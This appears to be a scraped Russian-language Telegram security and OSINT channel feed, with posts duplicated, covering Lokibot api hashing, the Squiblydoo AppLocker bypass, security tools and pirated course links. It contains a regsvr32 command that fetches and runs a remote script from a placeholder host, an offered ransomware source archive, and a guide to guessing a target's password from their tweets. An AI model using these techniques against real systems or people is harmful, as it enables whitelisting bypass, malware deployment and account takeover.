Lokibot - популярный стилер, одной из характерных черт которого является api hashing
Очень подробное описание того, что такое api hashing, на примере как раз Lokibot
https://neil-fox.github.io/Anti-analysis-using-api-hashing/
Образцы Lokibot можно найти тут
https://bazaar.abuse.ch/browse/tag/Lokibot/
Очень подробное описание того, что такое api hashing, на примере как раз Lokibot
https://neil-fox.github.io/Anti-analysis-using-api-hashing/
Образцы Lokibot можно найти тут
https://bazaar.abuse.ch/browse/tag/Lokibot/
Squiblydoo
AppLocker - фича винды (начиная с 7) позволяющая создать белый список запускаемых приложений. Приложения которые не входят в белый список, запустить нельзя. В 2016 году появился способ обхода данного ограничения, с помощью regsvr32.exe. regsvr32.exe - это легитимный виндовый бинарник регистрирующий DLL файлы в реестре. Он также является так называемым LOLBin (список лолбинов и их использование во вредоносных целях можно найти тут). regsvr32.exe позволяет также скачивать и запускать скрипты (sct) с удаленного сервера.
AppLocker - фича винды (начиная с 7) позволяющая создать белый список запускаемых приложений. Приложения которые не входят в белый список, запустить нельзя. В 2016 году появился способ обхода данного ограничения, с помощью regsvr32.exe. regsvr32.exe - это легитимный виндовый бинарник регистрирующий DLL файлы в реестре. Он также является так называемым LOLBin (список лолбинов и их использование во вредоносных целях можно найти тут). regsvr32.exe позволяет также скачивать и запускать скрипты (sct) с удаленного сервера.
regsvr32.exe /s /i:http://example.com/test.sct scrobj.dllДанная техника называется Squiblydoo. Несмотря на то, что техника стара, она все еще используется. На скрине пример вредоносного VBA макроса с довольно свежего сэмпла.
👍1
Anti_DDoS_Guardian_setup.exe
2.5 MB
#софт
Anti DDoS Guardian
Anti DDoS Guardian - это высокопроизводительное программное обеспечение для защиты от DDoS-атак для серверов Windows. Он управляет сетевыми потоками и предотвращает проникновение атакующего трафика. Защита Anti DDoS Guardian может справиться с большинством DDoS / DoS-атак, включая медленные HTTP-атаки Get & Post, атаки на приложения (уровень 7), атаки slowloris, атаки OWASP, атаки методом подбора пароля RDP
Anti DDoS Guardian
Anti DDoS Guardian - это высокопроизводительное программное обеспечение для защиты от DDoS-атак для серверов Windows. Он управляет сетевыми потоками и предотвращает проникновение атакующего трафика. Защита Anti DDoS Guardian может справиться с большинством DDoS / DoS-атак, включая медленные HTTP-атаки Get & Post, атаки на приложения (уровень 7), атаки slowloris, атаки OWASP, атаки методом подбора пароля RDP
GlassWireSetup.exe
53.9 MB
#софт
GlassWire
GlassWire - это программа безопасности и конфиденциальности, которая позволяет вам просматривать текущую и прошлую сетевую активность, а также обнаруживать вредоносные программы, шпионское ПО и другие скрытые угрозы.
GlassWire
GlassWire - это программа безопасности и конфиденциальности, которая позволяет вам просматривать текущую и прошлую сетевую активность, а также обнаруживать вредоносные программы, шпионское ПО и другие скрытые угрозы.
👍1
OSINT mindset voice chat
OSINT mindset
Запись первого эфира OSINT mindset voice chat.
Гости: Максим (Bafomet), Артём и Мефодий (MiF).
Темы:
- Деанонимизация Telegram-аккаунтов.
- Законность сбора данных парсингом сайтов и использования утечек.
- OSINT сетевой инфраструктуры;
- Популярные OSINT-инструменты и рекомендации от наших гостей.
- Использование canary-токенов и их обфускация.
Topics:
- Deanonymization of Telegram accounts.
- Legal aspects of sites scraping and use of leaks.
- OSINT of network infrastructure;
- Popular OSINT tools and recommendations from our guests.
- The use of canary tokens and their obfuscation.
Гости: Максим (Bafomet), Артём и Мефодий (MiF).
Темы:
- Деанонимизация Telegram-аккаунтов.
- Законность сбора данных парсингом сайтов и использования утечек.
- OSINT сетевой инфраструктуры;
- Популярные OSINT-инструменты и рекомендации от наших гостей.
- Использование canary-токенов и их обфускация.
Topics:
- Deanonymization of Telegram accounts.
- Legal aspects of sites scraping and use of leaks.
- OSINT of network infrastructure;
- Popular OSINT tools and recommendations from our guests.
- The use of canary tokens and their obfuscation.
👍1
Forwarded from OSINT CLUB
Orbit — это инструмент для исследования блокчейн-транзакций. Он предназначен для исследования переводов блокчейн-кошелька путем просмотра истории транзакций.
Собранные данные визуализируются в виде удобного графика.
Собранные данные визуализируются в виде удобного графика.
ParadiseRansom Source code.zip
123.7 KB
Исходные коды шифровальщика.
Исключительно в целях ознакомления и противодействия работе программ-вымогателей
Исключительно в целях ознакомления и противодействия работе программ-вымогателей
Представим ситуацию: на прикрепленном скриншоте изображен твит цели, пароль к профилю которой нам необходимо подобрать. Как это сделать?
Существует множество вариантов заполучить пароль конечного пользователя - прибегнуть к социальной инженерии и отослать фишинговое письмо, попробовать подобрать вручную, перейти к атаке по маске или воспользоваться паяльником. Но каждый из них крайне ситуативен и не всегда оправдан.
В одной из сцен «Собаки Баскервилей» Шерлок Холмс, осмотрев личные вещи жертвы, с первого раза смог угадать ее пароль. Такой же трюк мог бы пригодиться нам в настоящее время, но можем ли мы применить его в социальных сетях?
Согласно экспериментам, проведенным Карлтонским университетом и университетом Карнеги — Меллона, большинство людей придумывают пароли для учетных записей на основе личных интересов. Зачастую многие используют слова, напрямую связанные с любимыми увлечениями, работой, исповедуемой религией, видеоиграми, личными отношениями и прочими темами, которые их тревожат.
Взглянем еще раз на твит и сделаем предположения относительно пароля, согласно проведенным исследованиям: дочь цели зовут Джулия, любимый писатель цели - Джордж Оруэлл, самая известная книга которого - 1984. Объединим это все и получим «Julia1984». Это так просто?
Да, это действительно так. Анализируя утечки Ashley Madison и Myspace при помощи PACK (Password Analysis and Cracking Kit), можно также прийти к выводу, что люди склонны выбирать в качестве личного пароля существительные или имена собственные.
Использование твиттера значительно упрощает процедуру подбора - люди склонны щитпостить в него массу контента, подавляющая часть из которого - их личные переживания и интересы. В этой социальной сети также существует жесткое ограничение на количество символов, что заставляет пользователей писать более осмысленные тексты.
Похоже, что это и есть тот самый Шерлок, который вместо личных вещей роется в профилях пользователей и использует их как источник данных. Чтобы затем, объединив наиболее значимые из них, получить список всевозможных паролей.
https://github.com/utkusen/rhodiola
Существует множество вариантов заполучить пароль конечного пользователя - прибегнуть к социальной инженерии и отослать фишинговое письмо, попробовать подобрать вручную, перейти к атаке по маске или воспользоваться паяльником. Но каждый из них крайне ситуативен и не всегда оправдан.
В одной из сцен «Собаки Баскервилей» Шерлок Холмс, осмотрев личные вещи жертвы, с первого раза смог угадать ее пароль. Такой же трюк мог бы пригодиться нам в настоящее время, но можем ли мы применить его в социальных сетях?
Согласно экспериментам, проведенным Карлтонским университетом и университетом Карнеги — Меллона, большинство людей придумывают пароли для учетных записей на основе личных интересов. Зачастую многие используют слова, напрямую связанные с любимыми увлечениями, работой, исповедуемой религией, видеоиграми, личными отношениями и прочими темами, которые их тревожат.
Взглянем еще раз на твит и сделаем предположения относительно пароля, согласно проведенным исследованиям: дочь цели зовут Джулия, любимый писатель цели - Джордж Оруэлл, самая известная книга которого - 1984. Объединим это все и получим «Julia1984». Это так просто?
Да, это действительно так. Анализируя утечки Ashley Madison и Myspace при помощи PACK (Password Analysis and Cracking Kit), можно также прийти к выводу, что люди склонны выбирать в качестве личного пароля существительные или имена собственные.
Использование твиттера значительно упрощает процедуру подбора - люди склонны щитпостить в него массу контента, подавляющая часть из которого - их личные переживания и интересы. В этой социальной сети также существует жесткое ограничение на количество символов, что заставляет пользователей писать более осмысленные тексты.
Похоже, что это и есть тот самый Шерлок, который вместо личных вещей роется в профилях пользователей и использует их как источник данных. Чтобы затем, объединив наиболее значимые из них, получить список всевозможных паролей.
https://github.com/utkusen/rhodiola
👍1
Скрипты TamperMonkey/Greasemonkey, добавляющие отдельное боковое меню для парсинга пользователей и сообщений из чатов и каналов Telegram. Собранные данные можно экспортировать в
https://gist.github.com/fabledowl/
.csv для дальнейшего анализа.https://gist.github.com/fabledowl/
[CASP School] Курс Docker (2021)
https://cloud.mail.ru/public/zwvX/ysc9GqYvo/
5 занятий по 1 часу
14 лабораторных
После прохождения курса вы будете уметь на практике создавать собственные контейнеры, настраивать сеть, выполнять переносы и миграции проектов, ограничивать лимиты и управлять корректным завершением процессов внутри контейнера. Понимать и отлаживать сборку проектов на всех этапах. Упаковывать собственные приложения в контейнеры, запускать их в облаках и на серверах заказчиков.
https://cloud.mail.ru/public/zwvX/ysc9GqYvo/
5 занятий по 1 часу
14 лабораторных
После прохождения курса вы будете уметь на практике создавать собственные контейнеры, настраивать сеть, выполнять переносы и миграции проектов, ограничивать лимиты и управлять корректным завершением процессов внутри контейнера. Понимать и отлаживать сборку проектов на всех этапах. Упаковывать собственные приложения в контейнеры, запускать их в облаках и на серверах заказчиков.
Magento 2 (2021) PCRec
Пробежался по курсу, подойдет так же безопасникам, кто ищет в модулях бэкдоры, снифы, коих в Мадженте не мало.
===========================
За время курса вы изучите особенности платформы, научитесь писать для нее полнофункциональные расширения, а также познакомитесь с особенностями и более детально изучите фронтенд и бекенд разработку под Magento 2. Под конец курса вы, на основе Magento 2, создадите полноценное расширение/модуль и, благодаря полученным знаниям, сможете претендовать на должность Magento разработчика или PHP разработчика.
Пробежался по курсу, подойдет так же безопасникам, кто ищет в модулях бэкдоры, снифы, коих в Мадженте не мало.
===========================
За время курса вы изучите особенности платформы, научитесь писать для нее полнофункциональные расширения, а также познакомитесь с особенностями и более детально изучите фронтенд и бекенд разработку под Magento 2. Под конец курса вы, на основе Magento 2, создадите полноценное расширение/модуль и, благодаря полученным знаниям, сможете претендовать на должность Magento разработчика или PHP разработчика.
magnet:?xt=urn:btih:394e50ae009267c08cd362b15df73a4f06fd7b65&dn=[underver.se].t208716.torrent&tr=udp%3A%2F%2Ftracker.coppersurfer.tk%3A6969&tr=udp%3A%2F%2Ftracker.leechers-paradise.org%3A6969&tr=udp%3A%2F%2Fexplodie.org%3A6969&tr=udp%3A%2F%2Ftracker.opentrackr.org%3A1337&tr=http%3A%2F%2Fretracker.local/announce&tr=http%3A%2F%2Fund3rv3rse.info%2Ffree%2Fannounce
https://glvrd.ru/
Отличный сайт , довольно хорошо помогает в написании секьюрити отчетов без лишнего мусора.
Отличный сайт , довольно хорошо помогает в написании секьюрити отчетов без лишнего мусора.
👍1
Создание чат-ботов в WhatsApp, Telegram, Viber для маркетинга и продаж (2021)
https://edston.com/sozdanie-chat-botov
Чему вы научитесь:
• Создавать умных чат-ботов в мессенджерах Telegram, Viber, Whatsapp без навыков программирования;
• Настраивать уведомления и политику конфиденциальности;
• Сегментировать пользователей, создавать автоворонки и авторассылки в мессенджерах;
• Интегрировать чат-бота с платежными системами и CRM-системами;
• Создавать полноценный интернет магазин в Telegram;
• Отслеживать статистику и конверсию.
https://cloud.mail.ru/public/9HBK/f7tdy6PDc
https://edston.com/sozdanie-chat-botov
Чему вы научитесь:
• Создавать умных чат-ботов в мессенджерах Telegram, Viber, Whatsapp без навыков программирования;
• Настраивать уведомления и политику конфиденциальности;
• Сегментировать пользователей, создавать автоворонки и авторассылки в мессенджерах;
• Интегрировать чат-бота с платежными системами и CRM-системами;
• Создавать полноценный интернет магазин в Telegram;
• Отслеживать статистику и конверсию.
https://cloud.mail.ru/public/9HBK/f7tdy6PDc
magnet:?xt=urn:btih:738632ecba3c8ca973dc7868304f7aab037ba3b4&dn=[underver.se].t210240.torrent&tr=udp%3A%2F%2Ftracker.coppersurfer.tk%3A6969&tr=udp%3A%2F%2Ftracker.leechers-paradise.org%3A6969&tr=udp%3A%2F%2Fexplodie.org%3A6969&tr=udp%3A%2F%2Ftracker.opentrackr.org%3A1337&tr=http%3A%2F%2Fretracker.local/announce&tr=http%3A%2F%2Fund3rv3rse.info%2Ffree%2Fannounce
Андрей Масалович Информационные войны (2021) PCRec
#OSINT
Описание:
Как происходит противоборство в интернете, кто и как на нем зарабатывает. Позиционирование брендов, вбросы и заказные материалы, битвы компроматов, защита и профилактика.
magnet:?xt=urn:btih:71ffb75f5fc4af08fe9bafa552327afa49e56c8d&dn=[underver.se].t209928.torrent&tr=udp%3A%2F%2Ftracker.coppersurfer.tk%3A6969&tr=udp%3A%2F%2Ftracker.leechers-paradise.org%3A6969&tr=udp%3A%2F%2Fexplodie.org%3A6969&tr=udp%3A%2F%2Ftracker.opentrackr.org%3A1337&tr=http%3A%2F%2Fretracker.local/announce&tr=http%3A%2F%2Fund3rv3rse.info%2Ffree%2Fannounce
Первичный анализ данных в Python (Части 1-2) (2021) МФТИ
Данный курс нацелен на овладение Python и его дополнительными библиотеками для анализа данных.
Задача этого курса - научить с нуля навыкам программирования на Python и научить выполнять первичный анализ данных на Python. В данном курсе мы познакомимся с синтаксисом языка Python, а также научимся работать с его основными библиотеками, полезными для анализа данных, такими как NumPy, Matplotlib и Pandas.
На выходе слушатель сможет эффективно обрабатывать данные в Python, визуализировать данные, икать в данных закономерности и отвечать на любые вопросы по данным.
В курсе будет постоянный упор на практику. Будем постоянно осваивать инструменты для анализа данных и применять их для анализа данных на реальных задачах.
OSINT_по_русски_Выбираем_мощные_и_бесплатные_сервисы_для_пробива.pdf
14.3 MB
OSINT по-русски. Выбираем мощные и бесплатные сервисы для пробива и конкурентной разведки — «Хакер»
👍1